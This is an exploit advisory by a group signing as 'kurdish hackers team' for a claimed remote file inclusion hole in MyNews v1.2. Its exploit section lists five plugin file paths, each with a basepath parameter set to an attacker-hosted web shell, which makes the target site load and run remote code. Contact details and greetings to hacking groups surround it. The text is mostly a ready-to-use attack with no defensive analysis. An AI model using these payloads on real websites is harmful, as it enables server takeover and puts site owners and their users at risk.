MyNews v1.2  Remote File Inclusion Vulnerability

<<!>> Found by  :  kurdish hackers team

<<!>> C0ntact : pshela [at] YaHoo .com
                  
<<!>> Groups : Kurd-Team

<<!>> site   : www.kurdteam.org

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   ::  MyNews v1.2 

<<->> download script :: http://mynews.magtrb.com/

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Exploit ::
 
 >>> www.site/MyNews/includes/tiny_mce/plugins/filemanager/classes/FileManager/FileSystems/ZipFileImpl.php?basepath=[shell.txt?]
                  /MyNews/includes/tiny_mce/plugins/filemanager/classes/FileManager/FileManagerPlugin.php?basepath=[shell.txt?]
                 MyNews/includes/tiny_mce/plugins/filemanager/classes/FileSystems/RootFileImpl.php?basepath=[shell.txt?]
               MyNews/includes/tiny_mce/plugins/imagemanager/classes/ImageManager/ImageManagerPlugin.php?basepath=[shell.txt?] 
              MyNews/includes/tiny_mce/plugins/filemanager/classes/CorePlugin.php?basepath= [shell.txt?]                    
=======================================================
 <<->> All freinds , Zryan_kurd ,Root-SyS , all  Member cold hackers team(cmg-team.com) , all kurdish hackers
=======================================================